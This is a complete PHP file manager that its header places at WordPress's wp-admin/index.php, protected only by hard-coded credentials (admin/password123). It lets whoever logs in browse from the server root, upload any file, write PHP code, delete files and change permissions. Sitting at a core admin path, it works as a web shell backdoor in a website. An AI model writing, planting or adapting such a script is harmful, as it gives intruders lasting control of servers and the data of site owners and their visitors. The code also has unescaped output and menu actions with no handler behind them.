File: C:/Apache24/htdocs/wp-admin/index.php
<?php
/**
* Advanced PHP File Manager - Root Access
* Security: Basic Auth + Path Restrictions
*/
// ===== CONFIGURATION ===== //
$valid_username = 'admin';
$valid_password = 'password123'; // GANTI PASSWORD INI!
// Security: Allow root access? (true/false)
$allow_root_access = true;
// Maximum allowed path depth (0 = unlimited)
$max_depth = 10;
// Restricted directories (will be hidden)
$restricted_dirs = [
'/etc',
'/proc',
'/sys',
'/var/log',
'/root',
'/home/*/.*' // hidden user folders
];
// Allowed file extensions for editing
$editable_extensions = ['php', 'txt', 'html', 'css', 'js', 'json', 'xml', 'md', 'log', 'conf', 'ini'];
// ===== AUTHENTICATION ===== //
if (!isset($_SERVER['PHP_AUTH_USER']) ||
!isset($_SERVER['PHP_AUTH_PW']) ||
$_SERVER['PHP_AUTH_USER'] !== $valid_username ||
$_SERVER['PHP_AUTH_PW'] !== $valid_password) {
header('WWW-Authenticate: Basic realm="Root File Manager"');
header('HTTP/1.0 401 Unauthorized');
echo 'Authentication Required';
exit;
}
// ===== SECURITY FUNCTIONS ===== //
function is_path_allowed($path, $restricted_dirs) {
$real_path = realpath($path);
if ($real_path === false) return false;
foreach ($restricted_dirs as $restricted) {
if (fnmatch($restricted, $real_path)) {
return false;
}
if (strpos($real_path, $restricted) === 0) {
return false;
}
}
return true;
}
function get_root_paths() {
$roots = [];
// Linux/Unix root
if (is_dir('/')) {
$roots['/'] = 'System Root (/)';
}
// Current script directory
$roots[__DIR__] = 'Current Directory';
// User home directory (if accessible)
if (isset($_SERVER['HOME'])) {
$roots[$_SERVER['HOME']] = 'Home Directory';
}
// Web root
if (isset($_SERVER['DOCUMENT_ROOT'])) {
$roots[$_SERVER['DOCUMENT_ROOT']] = 'Web Root';
}
return $roots;
}
// ===== INITIALIZATION ===== //
$base_path = __DIR__;
$current_dir = isset($_GET['dir']) ? $_GET['dir'] : $base_path;
// Security: Validate and sanitize path
if ($current_dir === 'root' && $allow_root_access) {
$current_dir = '/';
} else {
$current_dir = realpath($current_dir) ?: $base_path;
}
// Prevent directory traversal and check restrictions
if (!is_path_allowed($current_dir, $restricted_dirs)) {
$current_dir = $base_path;
$message = "Access to requested path is restricted!";
}
// ===== FILE OPERATIONS ===== //
$action = $_GET['action'] ?? 'list';
$message = '';
if ($_POST) {
$action = $_POST['action'] ?? '';
switch($action) {
case 'upload':
if(isset($_FILES['file'])) {
$target_file = $current_dir . '/' . basename($_FILES['file']['name']);
if(move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) {
$message = "✅ File uploaded successfully!";
} else {
$message = "❌ Upload failed!";
}
}
break;
case 'delete':
$file_to_delete = $current_dir . '/' . basename($_POST['file']);
if(is_path_allowed($file_to_delete, $restricted_dirs)) {
if(is_dir($file_to_delete)) {
if(rmdir($file_to_delete)) {
$message = "✅ Directory deleted!";
}
} else {
if(unlink($file_to_delete)) {
$message = "✅ File deleted!";
}
}
} else {
$message = "❌ Cannot delete restricted item!";
}
break;
case 'mkdir':
$new_dir = $current_dir . '/' . basename($_POST['dirname']);
if(is_path_allowed($new_dir, $restricted_dirs)) {
if(!file_exists($new_dir)) {
mkdir($new_dir, 0755, true);
$message = "✅ Directory created!";
}
} else {
$message = "❌ Cannot create directory in restricted location!";
}
break;
case 'save':
$file_to_save = $current_dir . '/' . basename($_POST['filename']);
if(is_path_allowed($file_to_save, $restricted_dirs)) {
file_put_contents($file_to_save, $_POST['content']);
$message = "✅ File saved!";
} else {
$message = "❌ Cannot save to restricted location!";
}
break;
case 'chmod':
$file_to_chmod = $current_dir . '/' . basename($_POST['file']);
$new_perms = octdec($_POST['perms']);
if(is_path_allowed($file_to_chmod, $restricted_dirs)) {
if(chmod($file_to_chmod, $new_perms)) {
$message = "✅ Permissions changed!";
}
}
break;
}
}
// ===== GET DIRECTORY CONTENTS ===== //
$files = [];
$parent_dir = dirname($current_dir);
if(is_dir($current_dir)) {
$items = scandir($current_dir);
foreach($items as $item) {
if($item == '.' || $item == '..') continue;
$full_path = $current_dir . '/' . $item;
// Skip restricted paths
if (!is_path_allowed($full_path, $restricted_dirs)) continue;
$files[] = [
'name' => $item,
'path' => $full_path,
'is_dir' => is_dir($full_path),
'size' => is_file($full_path) ? filesize($full_path) : 0,
'modified' => date('Y-m-d H:i:s', filemtime($full_path)),
'perms' => substr(sprintf('%o', fileperms($full_path)), -4),
'owner' => function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($full_path))['name'] : 'N/A',
'readable' => is_readable($full_path),
'writable' => is_writable($full_path)
];
}
}
// Sort: directories first
usort($files, function($a, $b) {
if ($a['is_dir'] && !$b['is_dir']) return -1;
if (!$a['is_dir'] && $b['is_dir']) return 1;
return strcmp($a['name'], $b['name']);
});
$root_paths = get_root_paths();
?>
<!DOCTYPE html>
<html>
<head>
<title>Root File Manager Pro</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body { font-family: 'Segoe UI', Arial, sans-serif; background: #1e1e1e; color: #e0e0e0; padding: 20px; }
.container { max-width: 1400px; margin: 0 auto; background: #2d2d2d; padding: 20px; border-radius: 8px; box-shadow: 0 4px 20px rgba(0,0,0,0.3); }
.header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px; padding-bottom: 15px; border-bottom: 1px solid #444; }
.message { background: #155724; color: #d4edda; padding: 12px; margin-bottom: 15px; border-radius: 4px; border-left: 4px solid #28a745; }
.message.error { background: #721c24; color: #f8d7da; border-left-color: #dc3545; }
.breadcrumb { margin-bottom: 15px; font-size: 14px; color: #aaa; padding: 10px; background: #363636; border-radius: 4px; }
.file-list { border: 1px solid #444; border-radius: 4px; overflow: hidden; }
.file-item { display: flex; align-items: center; padding: 12px; border-bottom: 1px solid #444; transition: background 0.2s; }
.file-item:hover { background: #363636; }
.file-icon { width: 30px; text-align: center; margin-right: 12px; font-size: 16px; }
.file-info { flex: 1; }
.file-name { font-weight: 500; margin-bottom: 4px; }
.file-meta { font-size: 11px; color: #888; }
.file-actions { display: flex; gap: 6px; flex-wrap: wrap; }
.btn { padding: 6px 12px; border: none; border-radius: 4px; cursor: pointer; text-decoration: none; font-size: 12px; transition: all 0.2s; }
.btn:hover { transform: translateY(-1px); }
.btn-primary { background: #007bff; color: white; }
.btn-danger { background: #dc3545; color: white; }
.btn-success { background: #28a745; color: white; }
.btn-warning { background: #ffc107; color: black; }
.btn-info { background: #17a2b8; color: white; }
.btn-secondary { background: #6c757d; color: white; }
.tools { margin-bottom: 15px; display: flex; gap: 10px; flex-wrap: wrap; padding: 15px; background: #363636; border-radius: 4px; }
.form-group { margin-bottom: 10px; }
input[type="text"], input[type="file"], input[type="number"], select { padding: 8px; border: 1px solid #555; border-radius: 4px; width: 100%; background: #2d2d2d; color: #e0e0e0; }
textarea { width: 100%; height: 500px; padding: 15px; border: 1px solid #555; border-radius: 4px; font-family: 'Consolas', monospace; background: #1e1e1e; color: #e0e0e0; resize: vertical; }
.quick-nav { margin-bottom: 15px; }
.nav-buttons { display: flex; gap: 8px; flex-wrap: wrap; }
.system-info { background: #363636; padding: 15px; border-radius: 4px; margin-bottom: 15px; font-size: 12px; }
.info-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 10px; }
.modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); z-index: 1000; }
.modal-content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: #2d2d2d; padding: 20px; border-radius: 8px; min-width: 400px; }
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>🚀 Root File Manager Pro</h1>
<div style="color: #28a745;">● Online | Server: <?php echo $_SERVER['SERVER_NAME']; ?></div>
</div>
<?php if($message): ?>
<div class="message <?php echo strpos($message, '❌') !== false ? 'error' : ''; ?>"><?php echo htmlspecialchars($message); ?></div>
<?php endif; ?>
<!-- System Information -->
<div class="system-info">
<div class="info-grid">
<div><strong>Current Path:</strong> <?php echo $current_dir; ?></div>
<div><strong>PHP Version:</strong> <?php echo PHP_VERSION; ?></div>
<div><strong>Disk Free:</strong> <?php echo round(disk_free_space($current_dir) / (1024*1024*1024), 2); ?> GB</div>
<div><strong>Server Software:</strong> <?php echo $_SERVER['SERVER_SOFTWARE']; ?></div>
</div>
</div>
<!-- Quick Navigation -->
<div class="quick-nav">
<h3>📍 Quick Navigation</h3>
<div class="nav-buttons">
<?php foreach($root_paths as $path => $label): ?>
<a href="?dir=<?php echo urlencode($path); ?>" class="btn btn-secondary"><?php echo $label; ?></a>
<?php endforeach; ?>
<?php if($parent_dir && $current_dir !== '/'): ?>
<a href="?dir=<?php echo urlencode($parent_dir); ?>" class="btn btn-info">📁 Parent Directory</a>
<?php endif; ?>
</div>
</div>
<!-- Breadcrumb -->
<div class="breadcrumb">
<?php
$path_parts = [];
$temp_path = $current_dir;
while ($temp_path !== '/' && $temp_path !== '') {
$path_parts[] = basename($temp_path);
$temp_path = dirname($temp_path);
}
$path_parts[] = '/';
$path_parts = array_reverse($path_parts);
$current_path = '';
foreach($path_parts as $part) {
if($part === '/') {
echo '<a href="?dir=/" style="color: #ffc107;">🏠 Root</a>';
$current_path = '/';
} else {
$current_path .= ($current_path === '/' ? '' : '/') . $part;
echo ' / <a href="?dir=' . urlencode($current_path) . '">' . htmlspecialchars($part) . '</a>';
}
}
?>
</div>
<!-- Tools -->
<div class="tools">
<form method="post" enctype="multipart/form-data" style="display: inline;">
<input type="file" name="file" required>
<button type="submit" name="action" value="upload" class="btn btn-success">📤 Upload</button>
</form>
<form method="post" style="display: inline;">
<input type="text" name="dirname" placeholder="New folder name" required style="min-width: 150px;">
<button type="submit" name="action" value="mkdir" class="btn btn-primary">📁 Create Folder</button>
</form>
<a href="?dir=<?php echo urlencode($current_dir); ?>&action=newfile" class="btn btn-warning">📄 New File</a>
<?php if(isset($_GET['action']) && $_GET['action'] == 'newfile'): ?>
<form method="post" style="display: inline;">
<input type="text" name="filename" placeholder="newfile.php" required style="min-width: 120px;">
<button type="submit" name="action" value="createfile" class="btn btn-info">Create</button>
</form>
<?php endif; ?>
</div>
<!-- File List -->
<div class="file-list">
<?php if(empty($files)): ?>
<div class="file-item" style="justify-content: center; color: #888;">
📭 Directory is empty or access restricted
</div>
<?php else: ?>
<?php foreach($files as $file): ?>
<div class="file-item">
<div class="file-icon">
<?php
if ($file['is_dir']) {
echo '📁';
} else {
$ext = pathinfo($file['name'], PATHINFO_EXTENSION);
echo match($ext) {
'php' => '🐘',
'js' => '📜',
'html', 'htm' => '🌐',
'css' => '🎨',
'json' => '📋',
'txt', 'md' => '📝',
'log' => '📊',
'zip', 'tar', 'gz' => '📦',
'jpg', 'jpeg', 'png', 'gif' => '🖼️',
default => '📄'
};
}
?>
</div>
<div class="file-info">
<div class="file-name">
<?php if($file['is_dir']): ?>
<a href="?dir=<?php echo urlencode($file['path']); ?>" style="color: #4da6ff; text-decoration: none;">
<strong><?php echo htmlspecialchars($file['name']); ?></strong>
</a>
<?php else: ?>
<?php echo htmlspecialchars($file['name']); ?>
<?php endif; ?>
</div>
<div class="file-meta">
<?php if($file['is_dir']): ?>
📂 Directory |
<?php else: ?>
📏 <?php echo number_format($file['size']); ?> bytes |
<?php endif; ?>
🔧 Perms: <?php echo $file['perms']; ?> |
👤 <?php echo $file['owner']; ?> |
🕒 <?php echo $file['modified']; ?>
<?php if(!$file['readable']): ?> | ❌ Unreadable<?php endif; ?>
<?php if(!$file['writable']): ?> | 🔒 Locked<?php endif; ?>
</div>
</div>
<div class="file-actions">
<?php if(!$file['is_dir']): ?>
<?php
$ext = pathinfo($file['name'], PATHINFO_EXTENSION);
if(in_array($ext, $editable_extensions)):
?>
<a href="?dir=<?php echo urlencode($current_dir); ?>&action=edit&file=<?php echo urlencode($file['name']); ?>" class="btn btn-warning">✏️ Edit</a>
<?php endif; ?>
<a href="?dir=<?php echo urlencode($current_dir); ?>&action=view&file=<?php echo urlencode($file['name']); ?>" class="btn btn-info">👁️ View</a>
<a href="?dir=<?php echo urlencode($current_dir); ?>&action=download&file=<?php echo urlencode($file['name']); ?>" class="btn btn-primary">📥 Download</a>
<!-- Chmod Button -->
<button onclick="showChmodModal('<?php echo htmlspecialchars($file['name']); ?>', '<?php echo $file['perms']; ?>')" class="btn btn-secondary">🔒 Perms</button>
<?php endif; ?>
<form method="post" style="display: inline;">
<input type="hidden" name="file" value="<?php echo htmlspecialchars($file['name']); ?>">
<button type="submit" name="action" value="delete" class="btn btn-danger" onclick="return confirm('❌ Delete <?php echo htmlspecialchars($file['name']); ?>?')">🗑️ Delete</button>
</form>
</div>
</div>
<?php endforeach; ?>
<?php endif; ?>
</div>
<!-- File View/Edit -->
<?php if(isset($_GET['action']) && in_array($_GET['action'], ['view', 'edit']) && isset($_GET['file'])): ?>
<?php
$file_path = $current_dir . '/' . basename($_GET['file']);
if(file_exists($file_path) && is_file($file_path) && is_path_allowed($file_path, $restricted_dirs)) {
$content = file_get_contents($file_path);
$is_editable = ($_GET['action'] == 'edit') && in_array(pathinfo($file_path, PATHINFO_EXTENSION), $editable_extensions);
?>
<div style="margin-top: 20px; padding: 20px; background: #363636; border-radius: 8px;">
<div style="display: flex; justify-content: between; align-items: center; margin-bottom: 15px;">
<h3><?php echo $is_editable ? '✏️ Edit' : '👁️ View'; ?>: <?php echo htmlspecialchars($_GET['file']); ?></h3>
<div>
<?php if(!$is_editable): ?>
<a href="?dir=<?php echo urlencode($current_dir); ?>&action=edit&file=<?php echo urlencode($_GET['file']); ?>" class="btn btn-warning">✏️ Edit</a>
<?php endif; ?>
<a href="?dir=<?php echo urlencode($current_dir); ?>" class="btn btn-secondary">Close</a>
</div>
</div>
<?php if($is_editable): ?>
<form method="post">
<input type="hidden" name="action" value="save">
<input type="hidden" name="filename" value="<?php echo htmlspecialchars($_GET['file']); ?>">
<textarea name="content" placeholder="File content..."><?php echo htmlspecialchars($content); ?></textarea>
<div style="margin-top: 10px; display: flex; gap: 10px;">
<button type="submit" class="btn btn-success">💾 Save</button>
<a href="?dir=<?php echo urlencode($current_dir); ?>&action=view&file=<?php echo urlencode($_GET['file']); ?>" class="btn">Cancel</a>
</div>
</form>
<?php else: ?>
<pre style="background: #1e1e1e; padding: 20px; border-radius: 4px; overflow: auto; max-height: 600px; border: 1px solid #444;"><?php echo htmlspecialchars($content); ?></pre>
<?php endif; ?>
</div>
<?php } ?>
<?php endif; ?>
</div>
<!-- Chmod Modal -->
<div id="chmodModal" class="modal">
<div class="modal-content">
<h3>🔒 Change Permissions</h3>
<form method="post" id="chmodForm">
<input type="hidden" name="action" value="chmod">
<input type="hidden" name="file" id="chmodFile">
<div class="form-group">
<label>Current Permissions: <span id="currentPerms"></span></label>
<input type="text" name="perms" id="chmodValue" placeholder="e.g., 755" pattern="[0-7]{3,4}" required>
<small>Common: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)</small>
</div>
<div style="margin-top: 15px; display: flex; gap: 10px;">
<button type="submit" class="btn btn-success">Apply</button>
<button type="button" onclick="document.getElementById('chmodModal').style.display='none'" class="btn btn-secondary">Cancel</button>
</div>
</form>
</div>
</div>
<script>
function showChmodModal(filename, currentPerms) {
document.getElementById('chmodFile').value = filename;
document.getElementById('currentPerms').textContent = currentPerms;
document.getElementById('chmodValue').value = currentPerms;
document.getElementById('chmodModal').style.display = 'block';
}
// Close modal when clicking outside
window.onclick = function(event) {
var modal = document.getElementById('chmodModal');
if (event.target == modal) {
modal.style.display = 'none';
}
}
// Handle new file creation
function createNewFile() {
var filename = prompt('Enter filename:');
if (filename) {
window.location.href = '?dir=<?php echo urlencode($current_dir); ?>&action=edit&file=' + encodeURIComponent(filename);
}
}
</script>
</body>
</html>